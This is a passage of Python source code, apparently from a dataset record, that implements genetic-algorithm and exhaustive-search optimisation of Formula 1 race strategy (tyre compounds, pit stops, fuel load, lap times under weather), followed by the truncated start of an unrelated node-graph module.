'TyreAge':[], 'TyreWear':[] , 'FuelLoad':[] , 'PitStop': [], 'LapTime':[], 'NumPitStop': 0, 'Weather':self.weather.get_weather_percentage_list(), 'Valid':False, 'TotalTime': np.inf}\r\n\r\n weather = strategy['Weather'][:1]\r\n\r\n ### Get a random compound\r\n compound = self.randomCompound()\r\n strategy['TyreCompound'].append(compound)\r\n tyresAge = 0 \r\n strategy['TyreAge'].append(tyresAge)\r\n strategy['TyreWear'].append(self.getTyreWear(compound, tyresAge))\r\n\r\n ### The fuel load can be inferred by the coefficient of the fuel consumption, we add a random value between -10 and 10 to get a little variation\r\n initialFuelLoad = round(random.uniform(0,110),2)\r\n strategy['FuelLoad'].append(initialFuelLoad)\r\n\r\n ### At first lap the pit stop is not made (PitStop list means that at lap i^th the pit stop is made at the beginning of the lap)\r\n strategy['PitStop'].append(False)\r\n\r\n ### Compute lapTime\r\n strategy['LapTime'].append(self.getLapTime(compound=compound, compoundAge=tyresAge, lap=0, fuel_load=initialFuelLoad, conditions=weather, drs=False, pitStop=False))\r\n\r\n ### For every lap we repeat the whole process\r\n for lap in range(1,self.numLaps):\r\n weather = strategy['Weather'][:lap+1]\r\n\r\n ### The fuel does not depend on the compound and/or pit stops => we compute it and leave it here\r\n fuelLoad = self.getFuelLoad(initial_fuel=initialFuelLoad, conditions=weather)\r\n strategy['FuelLoad'].append(fuelLoad)\r\n\r\n newTyre = random.choice([True, False])\r\n\r\n if newTyre:\r\n compound = self.randomCompound()\r\n tyresAge = 0\r\n pitStop = True\r\n strategy['NumPitStop'] += 1\r\n else: \r\n compound = strategy['TyreCompound'][lap-1]\r\n tyresAge += 1\r\n pitStop = False\r\n \r\n \r\n strategy['TyreAge'].append(tyresAge)\r\n strategy['TyreCompound'].append(compound)\r\n strategy['TyreWear'].append(self.getTyreWear(compound, tyresAge))\r\n strategy['PitStop'].append(pitStop)\r\n strategy['LapTime'].append(self.getLapTime(compound=compound, compoundAge=tyresAge, lap=lap, fuel_load=fuelLoad, conditions=weather, drs=False, pitStop=pitStop))\r\n \r\n strategy['TotalTime'] = sum(strategy['LapTime'])\r\n return strategy\r\n \r\n\r\n # Function to get a random compound\r\n def randomCompound(self,):\r\n return random.choice(['Soft', 'Medium', 'Hard','Inter','Wet'])\r\n \r\n\r\n # Function to get the 
TyreWear given the compound and the lap\r\n def getTyreWear(self, compound:str, lap:int):\r\n if lap == 0:\r\n return {'FL':0.0, 'FR':0.0, 'RL':0.0, 'RR':0.0}\r\n\r\n wear = self.car.predict_tyre_wear(compound, lap)\r\n \r\n for key, val in wear.items():\r\n wear[key] = val/100\r\n \r\n return wear\r\n \r\n\r\n # Function for computing the lap time \r\n def getLapTime(self, compound:str, compoundAge:int, lap:int, fuel_load:float, conditions:list, drs:bool, pitStop:bool) -> int:\r\n conditions_int = conditions[-1]\r\n conditions_str = [self.weather.get_weather_string(c) for c in conditions[:-1]]\r\n\r\n time = self.car.predict_laptime(tyre=compound, tyre_age=compoundAge, lap=lap, start_fuel=fuel_load, conditions_str=conditions_str, conditions_int=conditions_int, drs=drs)\r\n\r\n if pitStop:\r\n time += self.pitStopTime\r\n\r\n if lap == 0:\r\n time += 2000\r\n\r\n return round(time) \r\n \r\n\r\n # Function to get the fuel load\r\n def getFuelLoad(self, initial_fuel:float, conditions:list) :\r\n weather = [self.weather.get_weather_string(c) for c in conditions[:-1]]\r\n return round(self.car.predict_fuel_weight(initial_fuel, weather), 2)\r\n \r\n\r\n # Function to get the best individual/strategy in the population\r\n def getBest(self, population:list, best={'TotalTime':np.inf}):\r\n \r\n for strategy in population:\r\n self.checkValidity(strategy)\r\n \r\n if strategy['Valid']:\r\n if strategy['TotalTime'] < best['TotalTime']:\r\n best = strategy\r\n \r\n return best, best['TotalTime']\r\n \r\n\r\n # Function for checking the validity of a strategy\r\n def checkValidity(self, strategy:dict):\r\n all_compounds = set(strategy['TyreCompound'])\r\n last_lap_fuel_load = self.getFuelLoad(strategy['FuelLoad'][0], strategy['Weather'])\r\n\r\n if any([x != 0 for x in strategy['Weather']]): \r\n ### If weather is not completely Dry the constraint of changing tyre does not apply anymore\r\n if last_lap_fuel_load >= 0:\r\n strategy['Valid'] = True\r\n return True\r\n \r\n else:\r\n if len(all_compounds) > 1 and last_lap_fuel_load >= 0:\r\n strategy['Valid'] = True\r\n return True\r\n \r\n strategy['Valid'] = False \r\n return False\r\n\r\n\r\n # Selection step with dynamic penalty\r\n def selection_dynamic_penalty(self, step:int, population:list, threshold_quantile:float, best:int):\r\n deltas = [abs(x['TotalTime'] - best) for x in population]\r\n max_delta = max(1,max(deltas))\r\n\r\n alpha = np.exp(1+(1/self.iterations)*step)\r\n penalty = [(delta/max_delta)*alpha for delta in deltas]\r\n\r\n quantile = np.quantile(penalty, threshold_quantile)\r\n\r\n for p, pop in zip(penalty, population):\r\n if not pop['Valid']:\r\n if pop['NumPitStop'] < 1 and all([x == 'Dry' for x in pop['Weather']]):\r\n p *= alpha\r\n if p == 0.0:\r\n p = np.exp(alpha)\r\n last_lap_fuel_load = self.getFuelLoad(initial_fuel=pop['FuelLoad'][0], conditions=pop['Weather'])\r\n if last_lap_fuel_load < 0:\r\n last_lap_fuel_load = abs(last_lap_fuel_load)\r\n p *= np.exp(last_lap_fuel_load)\r\n if p == 0.0:\r\n p = np.exp(last_lap_fuel_load)\r\n \r\n for idx, x in enumerate(population):\r\n x['Penalty'] = penalty[idx]\r\n sortedPopulation = sorted(population, key=lambda x: x['Penalty'])\r\n selected = [x for _, x in enumerate(sortedPopulation) if x['Penalty'] < quantile]\r\n \r\n for x in selected:\r\n x.pop('Penalty')\r\n \r\n return selected\r\n \r\n\r\n # Total crossover step\r\n def crossover(self, p1:dict, p2:dict,):\r\n ### Children are copies of parents by default\r\n c1, c2 = copy.deepcopy(p1), copy.deepcopy(p2)\r\n\r\n ### 
Check for recombination\r\n if random.random() < self.mu:\r\n c1, c2 = self.crossover_fuel(c1, c2)\r\n \r\n return [c1,c2]\r\n\r\n\r\n # Crossover step on the fuel\r\n def crossover_fuel(self, p1:dict, p2:dict):\r\n fuelLoad_p1 = p1['FuelLoad'][0]\r\n fuelLoad_p2 = p2['FuelLoad'][0]\r\n\r\n p1['FuelLoad'][0] = fuelLoad_p2\r\n p2['FuelLoad'][0] = fuelLoad_p1\r\n\r\n \r\n for lap in range(1, self.numLaps):\r\n fuelLoad_p1 = self.getFuelLoad(initial_fuel=fuelLoad_p2, conditions=p1['Weather'][:lap+1])\r\n fuelLoad_p2 = self.getFuelLoad(initial_fuel=fuelLoad_p1, conditions=p2['Weather'][:lap+1])\r\n p1['FuelLoad'][lap] = fuelLoad_p2\r\n p2['FuelLoad'][lap] = fuelLoad_p1\r\n \r\n return self.correct_strategy(p1), self.correct_strategy(p2)\r\n\r\n\r\n # Function to correct a strategy\r\n def correct_strategy(self, strategy:dict, index:int=0):\r\n initialFuelLoad = round(strategy['FuelLoad'][0],2)\r\n strategy['FuelLoad'][0] = initialFuelLoad\r\n tyre = strategy['TyreCompound'][0]\r\n strategy['LapTime'][0] = self.getLapTime(compound=tyre, compoundAge=0, lap=0, fuel_load=initialFuelLoad, conditions=strategy['Weather'][:1], drs=False, pitStop=strategy['PitStop'][0])\r\n pitStopCounter = 0\r\n \r\n if index != 0 and index != self.numLaps:\r\n compound = strategy['TyreCompound'][index-1]\r\n tyre_age = strategy['TyreAge'][index-1]\r\n while index < self.numLaps and strategy['PitStop'][index] == False:\r\n tyre_age += 1\r\n strategy['TyreAge'][index] = tyre_age\r\n strategy['TyreCompound'][index] = compound\r\n strategy['TyreWear'][index] = self.getTyreWear(strategy['TyreCompound'][index], strategy['TyreAge'][index])\r\n strategy['LapTime'][index] = self.getLapTime(strategy['TyreCompound'][index], strategy['TyreAge'][index], index, strategy['FuelLoad'][index], strategy['Weather'][:index+1], False, False)\r\n index += 1\r\n\r\n strategy['NumPitStop'] = sum([x for x in strategy['PitStop'] if x])\r\n strategy['TotalTime'] = sum(strategy['LapTime'])\r\n\r\n return strategy\r\n\r\n for lap in range(1, self.numLaps):\r\n weather = strategy['Weather'][:lap+1]\r\n\r\n ### FuelLoad keeps the same, it just needs to be corrected if changed\r\n fuelLoad = self.getFuelLoad(initial_fuel=initialFuelLoad, conditions=weather)\r\n strategy['FuelLoad'][lap] = fuelLoad\r\n\r\n ### Get if a pitstop is made and compound lap'\r\n pitStop = strategy['PitStop'][lap]\r\n old_compound = strategy['TyreCompound'][lap-1]\r\n compound = strategy['TyreCompound'][lap]\r\n tyresAge = strategy['TyreAge'][lap-1]\r\n \r\n ### We have two options: either there is a pitstop or the compound has changes, if so we have to recalculate all\r\n if pitStop or old_compound != compound or any([x >= 0.8 for x in strategy['TyreWear'][lap-1].values()]):\r\n tyresAge = 0\r\n pitStop = True\r\n pitStopCounter += 1\r\n else:\r\n tyresAge += 1\r\n \r\n tyreWear = self.getTyreWear(compound=compound, lap=tyresAge)\r\n timing = self.getLapTime(compound=compound, compoundAge=tyresAge, lap=lap, fuel_load=fuelLoad,conditions=weather, drs=False, pitStop=pitStop)\r\n strategy['PitStop'][lap] = pitStop\r\n strategy['TyreWear'][lap] = tyreWear\r\n strategy['TyreAge'][lap] = tyresAge\r\n strategy['LapTime'][lap] = timing\r\n\r\n strategy['NumPitStop'] = pitStopCounter\r\n strategy['TotalTime'] = sum(strategy['LapTime'])\r\n\r\n return strategy\r\n\r\n\r\n # Total function for the mutation step\r\n def mutation(self,child:dict) -> list:\r\n childAllMutated = copy.deepcopy(child)\r\n children = []\r\n\r\n if random.random() < self.sigma:\r\n 
children.append(self.mutation_compound(copy.deepcopy(child)))\r\n childAllMutated = self.mutation_compound(childAllMutated)\r\n \r\n if random.random() < self.sigma:\r\n children.append(self.mutation_pitstop(copy.deepcopy(child)))\r\n children.append(self.mutation_pitstop_add(copy.deepcopy(child)))\r\n \r\n childAllMutated = self.mutation_pitstop(childAllMutated)\r\n childAllMutated = self.mutation_pitstop_add(childAllMutated)\r\n\r\n if random.random() < self.sigma:\r\n children.append(self.mutation_fuel_load(copy.deepcopy(child)))\r\n childAllMutated = self.mutation_fuel_load(childAllMutated)\r\n \r\n children.append(childAllMutated)\r\n \r\n return children\r\n\r\n\r\n # Mutation step on the compound\r\n def mutation_compound(self, child:dict, ):\r\n usedTyres = dict()\r\n usedTyres[0] = child['TyreCompound'][0]\r\n for lap in range(1, self.numLaps):\r\n if child['TyreCompound'][lap] != child['TyreCompound'][lap - 1]:\r\n usedTyres[lap] = child['TyreCompound'][lap]\r\n\r\n lapRandom = random.randint(0, len(usedTyres)-1)\r\n \r\n lap = list(usedTyres.keys())[lapRandom]\r\n oldCompound = usedTyres[lap]\r\n\r\n compoundRandom = self.randomCompound()\r\n\r\n while oldCompound == compoundRandom:\r\n compoundRandom = self.randomCompound()\r\n \r\n child['TyreCompound'][lap] = compoundRandom\r\n\r\n for i in range(lap + 1, self.numLaps):\r\n if not child['PitStop'][lap]:\r\n child['TyreCompound'][i] = compoundRandom\r\n else:\r\n return self.correct_strategy(child)\r\n \r\n return self.correct_strategy(child)\r\n\r\n\r\n # Mutation step on the pitstop\r\n def mutation_pitstop(self,child:dict):\r\n childPitNum = child['NumPitStop'] \r\n\r\n ### Check if we cannot make different pitStops number\r\n if childPitNum < 1:\r\n return self.randomChild()\r\n \r\n ### There should be at least 1 pitstop\r\n if childPitNum == 1: \r\n return child\r\n \r\n numRandomPitStop = random.randint(1,childPitNum)\r\n numPitStops = 0\r\n index = -1\r\n for lap in range(0, self.numLaps):\r\n if child['PitStop'][lap] == True:\r\n numPitStops +=1\r\n if numPitStops == numRandomPitStop:\r\n child['PitStop'][lap] = False\r\n child['NumPitStop'] -= 1\r\n index = lap\r\n\r\n return self.correct_strategy(child, index)\r\n\r\n\r\n # Mutation step for adding a pitstop\r\n def mutation_pitstop_add(self, child:dict):\r\n random_lap = random.randint(1, self.numLaps-1)\r\n\r\n while child['PitStop'][random_lap] == True:\r\n random_lap = random.randint(1, self.numLaps-1)\r\n \r\n compound = self.randomCompound()\r\n \r\n tyre_age = 0\r\n child['PitStop'][random_lap] = True\r\n child['TyreAge'][random_lap] = tyre_age\r\n child['TyreWear'][random_lap] = self.getTyreWear(compound=compound, lap=tyre_age)\r\n child['TyreCompound'][random_lap] = compound\r\n child['LapTime'][random_lap] = self.getLapTime(compound=compound, compoundAge=tyre_age, lap=random_lap, fuel_load=child['FuelLoad'][random_lap], conditions=child['Weather'][:random_lap] if random_lap != 0 else child['Weather'][:random_lap], drs=False, pitStop=child['PitStop'][random_lap])\r\n child['NumPitStop'] += 1\r\n remaining = random_lap + 1\r\n tyre_age += 1\r\n while remaining < self.numLaps and child['PitStop'][remaining] == False:\r\n child['TyreWear'][remaining] = self.getTyreWear(compound=compound, lap=tyre_age)\r\n child['TyreCompound'][remaining] = compound\r\n child['TyreAge'][remaining] = tyre_age\r\n child['LapTime'][remaining] = self.getLapTime(compound=compound, compoundAge=tyre_age, lap=remaining, fuel_load=child['FuelLoad'][remaining], 
conditions=child['Weather'][:remaining+1], drs=False, pitStop=child['PitStop'][remaining])\r\n remaining += 1\r\n tyre_age += 1\r\n child['TotalTime'] = sum(child['LapTime'])\r\n \r\n return child\r\n \r\n\r\n # Mutation step on the fuel\r\n def mutation_fuel_load(self, child:dict, ):\r\n new_fuel = child['FuelLoad'][0]+random.uniform(-10,10)\r\n\r\n child['FuelLoad'][0] = new_fuel\r\n child['LapTime'][0] = self.getLapTime(compound=child['TyreCompound'][0], compoundAge=child['TyreAge'][0], lap=0, fuel_load=new_fuel, conditions=child['Weather'][:1], drs=False, pitStop=child['PitStop'][0])\r\n \r\n for lap in range(1,self.numLaps):\r\n fuel = self.getFuelLoad(initial_fuel=new_fuel, conditions=child['Weather'][:lap+1])\r\n timing = self.getLapTime(compound=child['TyreCompound'][lap], compoundAge=child['TyreAge'][lap], lap=lap, fuel_load=fuel, conditions=child['Weather'][:lap+1], drs=False, pitStop=child['PitStop'][lap])\r\n \r\n child['FuelLoad'][lap] = fuel\r\n child['LapTime'][lap] = timing\r\n\r\n child['TotalTime'] = sum(child['LapTime'])\r\n return child\r\n\r\n\r\n \"\"\"\r\n Bruteforce algorithm\r\n \"\"\"\r\n # Function to build the tree of the bruteforce algorithm\r\n def build_tree(self, temp_tree:list, tyres_age:int, lap:int):\r\n global BEST_TIME\r\n global STRATEGY\r\n\r\n weather = self.weather.get_weather_percentage_list()\r\n total_time = sum([x['LapTime'] for x in temp_tree])\r\n pitStop_count = sum([x['PitStop'] for x in temp_tree])\r\n initial_fuel = temp_tree[0]['FuelLoad']\r\n compound_set = set([x['Compound'] for x in temp_tree])\r\n\r\n if total_time > BEST_TIME or pitStop_count > 2:\r\n return {'Strategy':None, 'TotalTime':np.inf}\r\n\r\n if any([x >= 0.8 for x in temp_tree[-1]['TyreWear'].values()]):\r\n return {'Strategy':None, 'TotalTime':np.inf}\r\n\r\n if lap == self.numLaps:\r\n if total_time < BEST_TIME:\r\n if len(compound_set) > 1:\r\n BEST_TIME = total_time\r\n STRATEGY = copy.deepcopy(temp_tree)\r\n return {'Strategy':copy.deepcopy(temp_tree), 'TotalTime':total_time}\r\n \r\n return {'Strategy':None, 'TotalTime':np.inf}\r\n \r\n fuel_load = self.getFuelLoad(initial_fuel,weather[:lap+1])\r\n w = weather[lap]\r\n\r\n if w < 20:\r\n idx = 1\r\n values = {1:None, 2:None, 3:None, 4:None}\r\n for compound in ['Soft', 'Medium','Hard']:\r\n if compound == temp_tree[-1]['Compound']:\r\n for pitStop in [True,False]:\r\n node = {'Compound':compound, 'TyreWear': self.getTyreWear(compound, tyres_age+1 if not pitStop else 0), 'TyreAge':tyres_age+1 if not pitStop else 0, 'FuelLoad':fuel_load, 'PitStop':pitStop, 'LapTime': self.getLapTime(compound=compound, compoundAge=tyres_age+1 if not pitStop else 0, lap=lap, fuel_load=fuel_load, conditions=weather[:lap+1], drs=False, pitStop=pitStop)}\r\n temp_tree.append(node)\r\n values[idx] = self.build_tree(temp_tree, tyres_age+1 if not pitStop else 0, lap+1)\r\n temp_tree.pop()\r\n idx+=1\r\n else:\r\n pitStop = True\r\n node = {'Compound':compound, 'TyreWear': self.getTyreWear(compound, tyres_age+1 if not pitStop else 0), 'TyreAge':tyres_age+1 if not pitStop else 0, 'FuelLoad':fuel_load, 'PitStop':pitStop, 'LapTime': self.getLapTime(compound=compound, compoundAge=tyres_age+1 if not pitStop else 0, lap=lap, fuel_load=fuel_load, conditions=weather[:lap+1], drs=False, pitStop=pitStop)}\r\n temp_tree.append(node)\r\n values[idx] = self.build_tree(temp_tree, tyres_age+1 if not pitStop else 0, lap+1)\r\n temp_tree.pop()\r\n idx+=1\r\n elif w > 50 and w < 80:\r\n values = {1:None}\r\n idx = 1\r\n compound = 'Inter'\r\n if compound == 
temp_tree[-1]['Compound']:\r\n for pitStop in [True,False]:\r\n node = {'Compound':compound, 'TyreWear': self.getTyreWear(compound, tyres_age+1 if not pitStop else 0), 'TyreAge':tyres_age+1 if not pitStop else 0, 'FuelLoad':fuel_load, 'PitStop':pitStop, 'LapTime': self.getLapTime(compound=compound, compoundAge=tyres_age+1 if not pitStop else 0, lap=lap, fuel_load=fuel_load, conditions=weather[:lap+1], drs=False, pitStop=pitStop)}\r\n temp_tree.append(node)\r\n values[idx] = self.build_tree(temp_tree, tyres_age+1 if not pitStop else 0, lap+1)\r\n temp_tree.pop()\r\n else:\r\n pitStop = True\r\n node = {'Compound':compound, 'TyreWear': self.getTyreWear(compound, tyres_age+1 if not pitStop else 0), 'TyreAge':tyres_age+1 if not pitStop else 0, 'FuelLoad':fuel_load, 'PitStop':pitStop, 'LapTime': self.getLapTime(compound=compound, compoundAge=tyres_age+1 if not pitStop else 0, lap=lap, fuel_load=fuel_load, conditions=weather[:lap+1], drs=False, pitStop=pitStop)}\r\n temp_tree.append(node)\r\n values[idx] = self.build_tree(temp_tree, tyres_age+1 if not pitStop else 0, lap+1)\r\n temp_tree.pop()\r\n elif w > 80:\r\n values = {1:None}\r\n idx = 1\r\n compound = 'Wet'\r\n if compound == temp_tree[-1]['Compound']:\r\n for pitStop in [True,False]:\r\n node = {'Compound':compound, 'TyreWear': self.getTyreWear(compound, tyres_age+1 if not pitStop else 0), 'TyreAge':tyres_age+1 if not pitStop else 0, 'FuelLoad':fuel_load, 'PitStop':pitStop, 'LapTime': self.getLapTime(compound=compound, compoundAge=tyres_age+1 if not pitStop else 0, lap=lap, fuel_load=fuel_load, conditions=weather[:lap+1], drs=False, pitStop=pitStop)}\r\n temp_tree.append(node)\r\n values[idx] = self.build_tree(temp_tree, tyres_age+1 if not pitStop else 0, lap+1)\r\n temp_tree.pop()\r\n else:\r\n pitStop = True\r\n node = {'Compound':compound, 'TyreWear': self.getTyreWear(compound, tyres_age+1 if not pitStop else 0), 'TyreAge':tyres_age+1 if not pitStop else 0, 'FuelLoad':fuel_load, 'PitStop':pitStop, 'LapTime': self.getLapTime(compound=compound, compoundAge=tyres_age+1 if not pitStop else 0, lap=lap, fuel_load=fuel_load, conditions=weather[:lap+1], drs=False, pitStop=pitStop)}\r\n temp_tree.append(node)\r\n values[idx] = self.build_tree(temp_tree, tyres_age+1 if not pitStop else 0, lap+1)\r\n temp_tree.pop()\r\n else:\r\n values = {1:None, 2:None, 3:None, 4:None}\r\n idx = 1\r\n for compound in ['Inter','Soft', 'Medium','Hard']:\r\n if compound == temp_tree[-1]['Compound']:\r\n for pitStop in [True,False]:\r\n node = {'Compound':compound, 'TyreWear': self.getTyreWear(compound, tyres_age+1 if not pitStop else 0), 'TyreAge':tyres_age+1 if not pitStop else 0, 'FuelLoad':fuel_load, 'PitStop':pitStop, 'LapTime': self.getLapTime(compound=compound, compoundAge=tyres_age+1 if not pitStop else 0, lap=lap, fuel_load=fuel_load, conditions=weather[:lap+1], drs=False, pitStop=pitStop)}\r\n temp_tree.append(node)\r\n values[idx] = self.build_tree(temp_tree, tyres_age+1 if not pitStop else 0, lap+1)\r\n temp_tree.pop()\r\n idx+=1\r\n else:\r\n pitStop = True\r\n node = {'Compound':compound, 'TyreWear': self.getTyreWear(compound, tyres_age+1 if not pitStop else 0), 'TyreAge':tyres_age+1 if not pitStop else 0, 'FuelLoad':fuel_load, 'PitStop':pitStop, 'LapTime': self.getLapTime(compound=compound, compoundAge=tyres_age+1 if not pitStop else 0, lap=lap, fuel_load=fuel_load, conditions=weather[:lap+1], drs=False, pitStop=pitStop)}\r\n temp_tree.append(node)\r\n values[idx] = self.build_tree(temp_tree, tyres_age+1 if not pitStop else 0, lap+1)\r\n 
temp_tree.pop()\r\n idx+=1\r\n\r\n ### Best Strategy\r\n to_remove = list()\r\n for key, val in values.items():\r\n if val is None:\r\n to_remove.append(key)\r\n for key in to_remove:\r\n values.pop(key)\r\n for val in values.values():\r\n if val['Strategy'] is not None:\r\n if len(val['Strategy']) < self.numLaps:\r\n val['TotalTime'] = np.inf\r\n best_strategy = min(values, key=lambda x: values[x]['TotalTime'])\r\n\r\n\r\n return {'Strategy':copy.deepcopy(values[best_strategy]['Strategy']), 'TotalTime':values[best_strategy]['TotalTime']}\r\n\r\n\r\n # Function to get the result of the bruteforce algorithm\r\n def lower_bound(self,):\r\n ### Build the solution space as a tree\r\n temp_tree = []\r\n weather = self.weather.get_weather_percentage_list()\r\n initial_fuel = self.getInitialFuelLoad(weather)\r\n timer_start = time.time()\r\n w = weather[0]\r\n\r\n if w < 20:\r\n values = {1:None, 2:None, 3:None}\r\n \r\n ### Soft\r\n soft_timer = time.time()\r\n compound = 'Soft'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[1] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n soft_timer = ms_to_time(round(1000*(time.time() - soft_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {soft_timer}\")\r\n\r\n ### Medium\r\n medium_timer = time.time()\r\n compound = 'Medium'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[2] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n medium_timer = ms_to_time(round(1000*(time.time() - medium_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {medium_timer}\")\r\n\r\n ### Hard\r\n hard_timer = time.time()\r\n compound = 'Hard'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[3] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n hard_timer = ms_to_time(round(1000*(time.time() - hard_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {hard_timer}\")\r\n elif w > 50 and w < 80:\r\n values = {1:None}\r\n ### Inter\r\n inter_timer = time.time()\r\n compound = 'Inter'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[1] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n inter_timer = ms_to_time(round(1000*(time.time() - inter_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {inter_timer}\")\r\n elif w 
> 80:\r\n values = {1:None}\r\n\r\n ### Wet\r\n wet_timer = time.time()\r\n compound = 'Wet'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[1] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n wet_timer = ms_to_time(round(1000*(time.time() - wet_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {wet_timer}\")\r\n else:\r\n values = {1:None, 2:None, 3:None, 4:None}\r\n \r\n ### Inter\r\n inter_timer = time.time()\r\n compound = 'Inter'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[1] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n inter_timer = ms_to_time(round(1000*(time.time() - inter_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {inter_timer}\")\r\n\r\n ### Soft\r\n soft_timer = time.time()\r\n compound = 'Soft'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[2] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n soft_timer = ms_to_time(round(1000*(time.time() - soft_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {soft_timer}\")\r\n\r\n ### Medium\r\n medium_timer = time.time()\r\n compound = 'Medium'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[3] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n medium_timer = ms_to_time(round(1000*(time.time() - medium_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {medium_timer}\")\r\n\r\n ### Hard\r\n hard_timer = time.time()\r\n compound = 'Hard'\r\n print(f\"[BruteForce] Computations starting with {compound}...\")\r\n temp_tree.append({'Compound':compound, 'TyreWear': self.getTyreWear(compound, 0), 'TyreAge':0, 'FuelLoad':initial_fuel, 'PitStop':False, 'LapTime': self.getLapTime(compound=compound, compoundAge=0, lap=0, fuel_load=initial_fuel, conditions=[weather[0]], drs=False, pitStop=False)})\r\n values[4] = self.build_tree(temp_tree, 0, 1)\r\n temp_tree.pop()\r\n hard_timer = ms_to_time(round(1000*(time.time() - hard_timer)))\r\n print(f\"\\033[A\\033[K[BruteForce] {compound} computed in {hard_timer}\")\r\n\r\n ### Best Strategy\r\n best_strategy_index = min(values, key=lambda x: values[x]['TotalTime'])\r\n best_strategy, best_laptime = values[best_strategy_index]['Strategy'], values[best_strategy_index]['TotalTime']\r\n\r\n if best_strategy is None:\r\n 
print(f\"Strategy is none...\")\r\n exit(-1)\r\n\r\n for lap, strategy in enumerate(best_strategy):\r\n print(f\"Lap {lap+1} -> Compound '{strategy['Compound']}', TyresAge {strategy['TyreAge']}, Wear '{round(strategy['TyreWear']['FL']*100,1)}'% | '{round(strategy['TyreWear']['FR']*100,1)}'% | '{round(strategy['TyreWear']['RL']*100,1)}'% | '{round(strategy['TyreWear']['RR']*100,1)}'%, Fuel '{round(strategy['FuelLoad'],2)}' Kg, PitStop '{'Yes' if strategy['PitStop'] else 'No'}', Time '{ms_to_time(strategy['LapTime'])}' ms\")\r\n print(f\"Computed in time {ms_to_time(round(1000*(time.time()-timer_start)))}\")\r\n print(f\"Total time {ms_to_time(best_laptime)}\")\r\n\r\n ### Find the best solution\r\n return best_strategy, best_laptime\r\n \r\n\r\n # Function to get the initial fuel load \r\n def getInitialFuelLoad(self, conditions:list):\r\n weather = [self.weather.get_weather_string(c) for c in conditions[:-1]]\r\n return round(self.car.predict_starting_fuel(weather), 2)","repo_name":"bonom/Evolutionary-F1-Race-Strategy","sub_path":"classes/Genetic.py","file_name":"Genetic.py","file_ext":"py","file_size_in_byte":41981,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"40872218460","text":"# -*- coding: utf-8 -*-\n\nimport json\nfrom pyNodeGraph.module.sqt import *\nfrom pyNodeGraph.ui.graph.const import *\nfrom pyNodeGraph.core.parameter import (\n Parameter, StringParameter, TextParameter, FloatParameter, BoolParameter, Color4fParameter, IntParameter\n)\nfrom pyNodeGraph.utils.log import get_logger\nfrom pyNodeGraph.utils.const import INPUT_ATTRIBUTE_PREFIX, OUTPUT_ATTRIBUTE_PREFIX\nfrom pyNodeGraph.core.state.core import GraphState\n\nlogger = get_logger('pyNodeGraph.node')\n\n\nclass 